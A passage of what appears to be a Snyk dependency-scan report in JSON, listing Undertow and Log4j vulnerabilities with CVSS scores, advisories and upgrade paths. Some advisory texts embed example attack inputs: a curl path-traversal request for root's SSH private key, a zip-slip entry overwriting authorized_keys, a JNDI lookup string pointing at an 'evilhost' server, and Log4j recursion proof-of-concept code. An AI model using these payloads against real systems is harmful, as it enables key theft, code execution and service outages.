"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-06-24T09:04:33.419941Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-04T13:31:53.396581Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-05-28T11:02:47.420228Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-06-07T01:11:20.186304Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to insufficient limitations on the amount of `CONTINUATION` frames that can be sent within a single stream. An attacker can use up compute or memory resources to cause a disruption in service by sending packets to vulnerable servers.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [Apache Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)\n- [Github Commit](https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2268277)\n- [Security Notes](https://www.kb.cert.org/vuls/id/421644)\n", + "epssDetails": { + "percentile": "0.75602", + "probability": "0.00459", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-27316" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-06-21T06:34:44.643940Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-03T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-06-21T06:34:44.890198Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-24T09:04:33.419941Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7361775", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.33.Final)", + "[2.3.0.Final,2.3.12.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.33.Final", + "2.3.12.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259475", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-05-09T13:34:57.715909Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:52:49.711513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-06-24T08:51:30.646140Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-05-09T13:34:57.715909Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:49.711513Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Directory Traversal due to improper input validation of the HTTP request. An attacker can access privileged or restricted files and directories by appending a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2259475)\n", + "epssDetails": { + "percentile": "0.20823", + "probability": "0.00052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-1459" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-06-24T08:51:30.470325Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-01-18T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-06-24T08:51:30.645852Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-24T08:51:30.646140Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7433720", + "title": "Uncontrolled Recursion", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.3.8.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.8.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292211", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/errata/RHSA-2024:4392", + "title": "Red Hat Security Advisory" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.7, + "cvssVersion": "4.0", + "modificationTime": "2024-07-17T10:19:41.285562Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-07-17T10:19:41.285562Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion in chunked response handling. An attacker can cause a client to wait indefinitely by sending excessive data without a `0\\r\\n` termination sequence in chunked responses, thereby disrupting service to the server. \r\n\r\n**Note:** This is only exploitable when using `NewSessionTicket` functionality in TLS 1.3 on Java 17.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.3.8.Final or higher.\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2292211)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n", + "epssDetails": { + "percentile": "0.16001", + "probability": "0.00045", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-5971" + ], + "CWE": [ + "CWE-674" + ], + "GHSA": [ + "GHSA-xpp6-8r3j-ww43" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-07-10T07:31:06.494967Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-07-08T21:31:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-07-10T14:09:02.139513Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-17T10:19:41.285562Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.3.8.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7433721", + "title": "Memory Leak", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 2.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/errata/RHSA-2024:4392", + "title": "Red Hat Security Advisory" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 2.3, + "cvssVersion": "4.0", + "modificationTime": "2024-07-10T14:39:24.891744Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-10T14:39:24.891744Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", + "epssDetails": { + "percentile": "0.16001", + "probability": "0.00045", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-3653" + ], + "CWE": [ + "CWE-401" + ], + "GHSA": [ + "GHSA-ch7q-gpff-h9hp" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-07-10T07:43:42.505449Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-07-09T00:31:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-07-10T14:39:24.891304Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-10T14:39:24.891744Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.16.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.15.0" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.15.0" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + "2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": 